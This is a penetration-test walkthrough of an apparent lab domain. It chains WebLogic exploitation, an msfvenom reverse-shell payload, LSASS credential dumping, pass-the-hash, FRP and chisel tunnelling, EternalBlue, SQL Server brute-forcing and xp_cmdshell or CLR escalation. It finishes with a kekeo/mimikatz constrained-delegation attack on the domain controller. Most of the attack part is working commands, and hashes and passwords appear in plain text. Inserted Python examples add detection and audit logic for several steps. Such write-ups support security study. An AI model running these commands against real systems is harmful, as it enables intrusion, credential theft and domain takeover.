Preface
This article records a penetration test of a domain environment with a two-layer intranet and covers the basic methods, ideas and skills of intranet domain penetration. MSF, CobaltStrike, FRP, chisel, SharpSQLTools and other tools were used in turn, and the domain controller was finally taken down through constrained delegation. Because many small tools are involved, the article is long; the journey begins below.
The network topology is as follows:
The web server
First round of port scanning:
We directly discovered the internal network's IP address. One thing needs to be explained in advance: because of how the lab range was built, WebLogic can only resolve the IP address 10.10.20.12, so we have to adjust the IP settings. We will change it back to the 192 segment after we are done with WebLogic.
Note the WebLogic version, look up an exploit, and do a round of SMB information gathering.
SMB Information Collection
smbmap -H 10.10.20.12
smbclient -N -L //10.10.20.12
enum4linux -a 10.10.20.12
rpcclient -U '' 10.10.20.12
smbclient -U "" -L \\10.10.20.12
Exploit weblogic vulnerabilities
If you know the specific version of WebLogic, you can directly search for vulnerabilities or use tools to scan them automatically.
Here we exploit a known CVE directly;
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.20.4 LPORT=1234 -f psh-cmd > exploit.ps1
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 10.10.20.4
set lport 1234
exploit
Migrate to another process and start dumping credentials.
Crack the hash; it turns out to be a weak password;
Now it is easier to switch to CS (CobaltStrike);
./teamserver 192.168.223.138 123456
java -XX:ParallelGCThreads=4 -XX:+AggressiveHeap -XX:+UseParallelGC -Xmx1024M -javaagent:hook.jar -jar cobaltstrike.jar
Another round of information gathering;
WebLogic data decryption
The following introduces how to fetch the hash from the registry;
After a successful dump, pull it back to the local machine;
Decrypt it locally;
Now that we have the hash, let's try to continue without MSF and CS;
evil-winrm -u administrator -H ccef208c6485269c20db2cad21734fe7 -i 192.168.223.165
get-process -name lsass
rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 500 C:\temp\lsass.dmp full
rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 500 C:\windows\temp\lsass.dmp full
ls C:\windows\temp\lsass.dmp
download C:\windows\temp\lsass.dmp
Rename lsass.dmp to weblogic.dmp;
pypykatz lsa minidump weblogic.dmp -o weblogic.txt
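The dump above goes through rundll32.exe calling the MiniDump export of comsvcs.dll against the lsass process, which is a well-known and easily logged pattern. As an added example (not part of the original article), here is detection logic in Python run over a few constructed process-creation records in a Sysmon Event ID 1 style; the pipe-delimited format and every event line are made up for the example.

```python
import re
from typing import Dict, List

# Constructed process-creation records, pipe-delimited:
# time|host|event_id|image|parent_image|command_line. Not real telemetry.
SAMPLE_EVENTS = r"""
2021-06-01T10:00:01Z|WEB01|1|C:\Windows\System32\rundll32.exe|C:\Windows\explorer.exe|rundll32.exe shell32.dll,Control_RunDLL desk.cpl
2021-06-01T10:00:05Z|WEB01|1|C:\Windows\System32\rundll32.exe|C:\Windows\System32\wsmprovhost.exe|rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 500 C:\windows\temp\lsass.dmp full
2021-06-01T10:00:09Z|WEB01|1|C:\Windows\System32\rundll32.exe|C:\Windows\System32\cmd.exe|rundll32.exe comsvcs.dll, #24 612 C:\Users\Public\x.bin full
2021-06-01T10:00:12Z|WEB01|1|C:\Windows\System32\notepad.exe|C:\Windows\explorer.exe|notepad.exe C:\temp\notes.txt
""".strip().splitlines()

# comsvcs.dll exports MiniDump; it can be referenced by name or by ordinal (#24),
# so the rule accepts both. Groups: target PID and output path.
MINIDUMP_RE = re.compile(
    r"comsvcs(?:\.dll)?\s*,\s*(?:#24|minidump)\s+(\d+)\s+(\S+)", re.IGNORECASE)

# Parent processes that indicate a remote administrative session (WinRM, WMI)
# rather than an interactive user at the console.
REMOTE_PARENTS = {"wsmprovhost.exe", "winrshost.exe", "wmiprvse.exe"}


def parse_event(line: str) -> Dict[str, str]:
    """Split one constructed record into its named fields."""
    time, host, event_id, image, parent, cmd = line.split("|", 5)
    return {"time": time, "host": host, "event_id": event_id,
            "image": image, "parent_image": parent, "command_line": cmd}


def detect_lsass_dumps(lines: List[str]) -> List[Dict[str, object]]:
    """Return one finding per rundll32 invocation of comsvcs.dll MiniDump."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        if ev["event_id"] != "1":
            continue
        if not ev["image"].lower().endswith("rundll32.exe"):
            continue
        match = MINIDUMP_RE.search(ev["command_line"])
        if not match:
            continue
        parent_name = ev["parent_image"].rsplit("\\", 1)[-1].lower()
        findings.append({
            "time": ev["time"],
            "host": ev["host"],
            "pid": match.group(1),             # PID handed to MiniDump (lsass here)
            "dump_path": match.group(2),       # where the memory image was written
            "via_ordinal": "#24" in match.group(0),
            "remote_session": parent_name in REMOTE_PARENTS,
        })
    return findings


if __name__ == "__main__":
    for f in detect_lsass_dumps(SAMPLE_EVENTS):
        print(f)
```

The rule keys on the DLL and export rather than on the output filename, because the dump is renamed immediately afterwards in the walkthrough above. The second finding shows the ordinal form, which a name-only rule would miss. Preventive controls that make this dump useless or impossible on a real host are LSA protection (RunAsPPL) and Credential Guard; the detection complements them rather than replacing them.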
We did not find the expected password, so let's try another method;
The decryption tool can now decrypt it;
Now that the Web server is out of the way, let’s start infiltrating personal hosts.
Personal host
Exploiting EternalBlue
Once inside the intranet, the personal host cannot reach out of the intranet directly, so a proxy needs to be set up.
FRP proxy
Server side
[common]
bind_addr = 192.168.223.138
bind_port = 7000
token = Xa3BJf2l5enmN6Z7A8mv
[socks5]
type = tcp
remote_port = 7777
plugin = socks5
Client
[common]
server_addr = 192.168.223.138
server_port = 7000
token = Xa3BJf2l5enmN6Z7A8mv
[plugin_socks]
type = tcp
remote_port = 7777
plugin = socks5
proxychains nmap -v -Pn -T3 -sV -n -sT --open -p 45,23,21,445,135,139,5985,2121,3389,13389,6379,4 p, 22122, 2222, 2223 9,53,995,8140,993,465 505143 3330 6500 0523 6590 0543 2152 1109, 878700, 1389902119, 4108 0,88 10.10.20.7
You can also try chisel here;
./chisel server -p 8000 --reverse
./chisel client 192.168.223.138:8000 R:8100:socks
Set up the proxy configuration in Kali;
proxychains nmap --script smb-vuln* -p 445 -sT -Pn 10.10.20.7 -vvv
Obviously EternalBlue; the FRP proxy is used here, with MSF for convenience.
msf6 > setg Proxies socks5:192.168.223.138:7777
msf6 > setg ReverseAllowProxy true
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 > set payload windows/x64/meterpreter/bind_tcp
msf6 > set rhost 10.10.20.7
msf6 > run
The personal host is compromised; dump the credentials as usual;
Here is another credential-dumping idea: take a memory dump on the target and bring it back to the local machine for decryption and analysis. In some cases this works wonders;
Fetch it locally and parse the minidump
View results;
For convenience, we continue with CobaltStrike. MSF and CS sessions are interoperable, but I prefer to use CS directly once a host is compromised. The Web server was already brought online in CS earlier; the essence here is CS's pivoting (relay) function.
Because this Win7 host cannot reach the Internet, it can only be brought online through CobaltStrike's pivot settings:
Create a relay listener first:
Generate Trojan:
Upload and run the Trojan using MSF.
Another round of information gathering;
You can see that there are two machines behind the personal host, namely the domain controller and the database server. A secondary proxy must be set up before the next step of the infiltration.
Secondary proxy setup
Let's look at how FRP builds a secondary proxy;
Configure the server on Kali;
Configure the Web server (one server and one client on the same host);
Configure the client on the personal host.
Scan test;
Building a secondary proxy with chisel;
Configure the server on Kali;
Configure the client and server on the Web server.
Configure the client on the personal host.
Scan test;
proxychains nmap -sC -sV -F -sT -Pn 10.10.10.18 -vvv
Database server
Bloodhound is used to analyze the domain environment and decide the next step of the infiltration. Its installation and use are not covered here, as I covered them in previous articles.
Shortest path to domain admin;
redteam.red\sqlserver is allowed to delegate to the CIFS service of OWA (the domain controller);
At this point the basic approach is clear: take down the domain controller through a delegation attack.
Collect information based on the earlier port scanning results.
Combined with the personal host we already control: the current process is not running as a domain user, so token stealing is set aside for now:
In a nutshell: in Windows, a normal user's properties have no Delegation tab; only service accounts and host (computer) accounts do. A service account is a type of user in the domain: the account a server uses to run a service, which is registered in the domain when the service is installed. For example, when MS SQL Server is installed, the service account SqlServiceAccount is automatically registered in the domain. Such an account cannot be used for interactive logon. (Further details are left to the reader.)
Since we have obtained the account password of a domain user, try to find the constraint delegate user:
AdFind.exe -h 10.10.10.8 -u saul -up admin!@#45 -b "DC=redteam,DC=red" -f "(&(samAccountType=805306368)(msds-allowedtodelegateto=*))" cn distinguishedName msds-allowedtodelegateto
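The LDAP filter above finds user objects (samAccountType 805306368) with msDS-AllowedToDelegateTo set, which is exactly what a defender should be auditing for as well. As an added example (not part of the original article), the Python below reviews a constructed set of directory records with the same attributes plus userAccountControl, and grades each delegation configuration: constrained delegation to a domain controller, constrained delegation with protocol transition (the TRUSTED_TO_AUTH_FOR_DELEGATION bit, which lets the service obtain tickets for arbitrary users), unconstrained delegation, and privileged accounts that lack the NOT_DELEGATED protection. The userAccountControl bit values are the real AD constants; the account records and the domain-controller host list are made up for the example.

```python
from dataclasses import dataclass
from typing import Dict, Iterable, List, Set

# userAccountControl bit flags (real AD constants).
TRUSTED_FOR_DELEGATION = 0x80000            # unconstrained delegation
NOT_DELEGATED = 0x100000                    # "Account is sensitive and cannot be delegated"
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # constrained delegation with protocol transition
NORMAL_ACCOUNT = 0x200


@dataclass
class Finding:
    account: str
    kind: str
    severity: str
    detail: str


# Constructed user objects modelled on the attributes queried above.
# Hypothetical values; not taken from a real directory.
SAMPLE_ACCOUNTS: List[Dict[str, object]] = [
    {"sAMAccountName": "sqlserver",
     "userAccountControl": NORMAL_ACCOUNT | TRUSTED_TO_AUTH_FOR_DELEGATION,
     "msDS-AllowedToDelegateTo": ["cifs/owa.redteam.red", "cifs/owa"]},
    {"sAMAccountName": "administrator", "userAccountControl": NORMAL_ACCOUNT,
     "msDS-AllowedToDelegateTo": []},
    {"sAMAccountName": "saul", "userAccountControl": NORMAL_ACCOUNT,
     "msDS-AllowedToDelegateTo": []},
    {"sAMAccountName": "backupsvc",
     "userAccountControl": NORMAL_ACCOUNT | TRUSTED_FOR_DELEGATION,
     "msDS-AllowedToDelegateTo": []},
]


def spn_hosts(spns: Iterable[str]) -> Set[str]:
    """Extract the lower-cased host part of service/host[:port] SPNs."""
    hosts = set()
    for spn in spns:
        if "/" in spn:
            hosts.add(spn.split("/", 1)[1].split(":", 1)[0].lower())
    return hosts


def audit_delegation(accounts: List[Dict[str, object]],
                     dc_hosts: Iterable[str],
                     privileged: Iterable[str]) -> List[Finding]:
    """Grade delegation settings; dc_hosts and privileged are the defender's own lists."""
    dcs = {h.lower() for h in dc_hosts}
    privs = {p.lower() for p in privileged}
    findings: List[Finding] = []
    for acct in accounts:
        name = str(acct["sAMAccountName"])
        uac = int(acct["userAccountControl"])
        targets = list(acct.get("msDS-AllowedToDelegateTo", []))

        if uac & TRUSTED_FOR_DELEGATION:
            findings.append(Finding(name, "unconstrained", "high",
                "TRUSTED_FOR_DELEGATION: TGTs of any user authenticating to this "
                "service are cached and reusable; replace with constrained delegation"))

        if targets:
            to_dc = bool(spn_hosts(targets) & dcs)
            transition = bool(uac & TRUSTED_TO_AUTH_FOR_DELEGATION)
            if to_dc and transition:
                severity = "critical"   # can mint tickets for any user to a DC service
            elif to_dc:
                severity = "high"
            else:
                severity = "medium"
            findings.append(Finding(name, "constrained", severity,
                f"delegates to {sorted(targets)}; protocol transition={transition}; "
                f"targets a DC={to_dc}"))

        # Privileged principals should never be delegatable at all.
        if name.lower() in privs and not uac & NOT_DELEGATED:
            findings.append(Finding(name, "delegation_allowed_for_privileged", "medium",
                "set NOT_DELEGATED or add the account to Protected Users"))
    return findings


if __name__ == "__main__":
    for f in audit_delegation(SAMPLE_ACCOUNTS, ["owa.redteam.red"], ["administrator"]):
        print(f)
```

Two remediations follow directly from the grading: remove protocol transition unless the service genuinely needs Kerberos-only clients impersonated, and mark administrative accounts as sensitive (or place them in Protected Users) so that no service, however misconfigured, can obtain tickets on their behalf.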
The sqlserver user has constrained delegation configured, but we still need its password. We already know that port 1433 is open, so let's try brute-forcing it;
This allows us to execute commands through xp_cmdshell;
The resulting privilege is only that of an ordinary service account.
Enable CLR on the target using SharpSQLTools (the proxy is attached via Proxifier; no screenshots taken):
SharpSQLTools.exe 10.10.10.18 sa sa master install_clr whoami
Then enable and invoke the command:
SharpSQLTools.exe 10.10.10.18 sa sa master enable_clr
SharpSQLTools.exe 10.10.10.18 sa sa master clr_efspotato whoami
Privilege escalation succeeded.
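Both steps above (command execution through xp_cmdshell, then loading a CLR assembly) leave configuration changes behind that a SQL Server audit or Extended Events session records. As an added example (not part of the original article), this Python classifies constructed (login, T-SQL) records against a small rule set covering the enabling statements and the UNSAFE assembly load; the records and the hex placeholder are made up, and the rule ordering matters because a generic xp_cmdshell match must not shadow the more specific configuration-change rules.

```python
import re
from typing import List, Optional, Tuple

# Constructed (login, T-SQL statement) records standing in for SQL Server Audit
# or Extended Events output. Not real audit data; the hex blob is a placeholder.
SAMPLE_STATEMENTS: List[Tuple[str, str]] = [
    ("sa", "EXEC sp_configure 'show advanced options', 1; RECONFIGURE;"),
    ("sa", "EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;"),
    ("sa", "EXEC master..xp_cmdshell 'whoami'"),
    ("sa", "EXEC sp_configure 'clr enabled', 1; RECONFIGURE;"),
    ("sa", "EXEC sp_configure 'clr strict security', 0; RECONFIGURE;"),
    ("sa", "CREATE ASSEMBLY payload FROM 0x4D5A_PLACEHOLDER WITH PERMISSION_SET = UNSAFE"),
    ("app_user", "SELECT TOP 10 * FROM dbo.Orders WHERE customer_id = @id"),
]

# (rule name, pattern, severity). First match wins, so configuration changes are
# tested before the generic xp_cmdshell call.
RULES = [
    ("enable_xp_cmdshell",
     re.compile(r"sp_configure\s+N?'xp_cmdshell'\s*,\s*1\b", re.I), "critical"),
    ("enable_clr",
     re.compile(r"sp_configure\s+N?'clr enabled'\s*,\s*1\b", re.I), "high"),
    ("disable_clr_strict_security",
     re.compile(r"sp_configure\s+N?'clr strict security'\s*,\s*0\b", re.I), "high"),
    ("unsafe_assembly",
     re.compile(r"create\s+assembly\b.*permission_set\s*=\s*unsafe", re.I | re.S), "critical"),
    ("xp_cmdshell_exec",
     re.compile(r"\bxp_cmdshell\b", re.I), "high"),
]


def classify(statement: str) -> Optional[Tuple[str, str]]:
    """Return (rule name, severity) for the first matching rule, or None."""
    for name, pattern, severity in RULES:
        if pattern.search(statement):
            return name, severity
    return None


def scan_statements(records: List[Tuple[str, str]]) -> List[Tuple[str, str, str]]:
    """Return (login, rule, severity) for every statement that triggers a rule."""
    alerts = []
    for login, statement in records:
        hit = classify(statement)
        if hit:
            alerts.append((login, hit[0], hit[1]))
    return alerts


if __name__ == "__main__":
    for alert in scan_statements(SAMPLE_STATEMENTS):
        print(alert)
```

The hardened baseline these rules assume is xp_cmdshell disabled, 'clr strict security' left at 1 (its default on current versions, which blocks UNSAFE assemblies that are not signed and trusted), and the sa login disabled or protected by a strong password, since the whole chain above starts from sa/sa.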
Next, use MSF to upload files;
Upload a CS Trojan;
Then run the CS Trojan with the elevated privileges;
Online successfully;
Dump the credentials;
At this point, the database server infiltration is complete, and the domain control infiltration begins.
Domain control
Following the analysis above, this is purely about taking down the domain controller using constrained delegation.
1. Use kekeo to request the user's TGT (saved as TGT_sqlserver@REDTEAM.RED_krbtgt~redteam.red@REDTEAM.RED.kirbi):
kekeo.exe "tgt::ask /user:sqlserver /domain:redteam.red /password:Server12345 /ticket:administrator.kirbi"
2. Then use the TGT (TGT_sqlserver@REDTEAM.RED_krbtgt~redteam.red@REDTEAM.RED.kirbi) to obtain a service ticket (ST) for the domain machine, saved as TGS_administrator@redteam.red@REDTEAM.RED_cifs~owa.redteam.red@REDTEAM.RED.kirbi:
kekeo.exe "tgs::s4u /tgt:TGT_sqlserver@REDTEAM.RED_krbtgt~redteam.red@REDTEAM.RED.kirbi /user:administrator@redteam.red /service:cifs/owa.redteam.red"
3. Use mimikatz to import the service ticket into the current session:
mimikatz kerberos::ptt TGS_administrator@redteam.red@REDTEAM.RED_cifs~owa.redteam.red@REDTEAM.RED.kirbi
Domain controller privileges obtained successfully.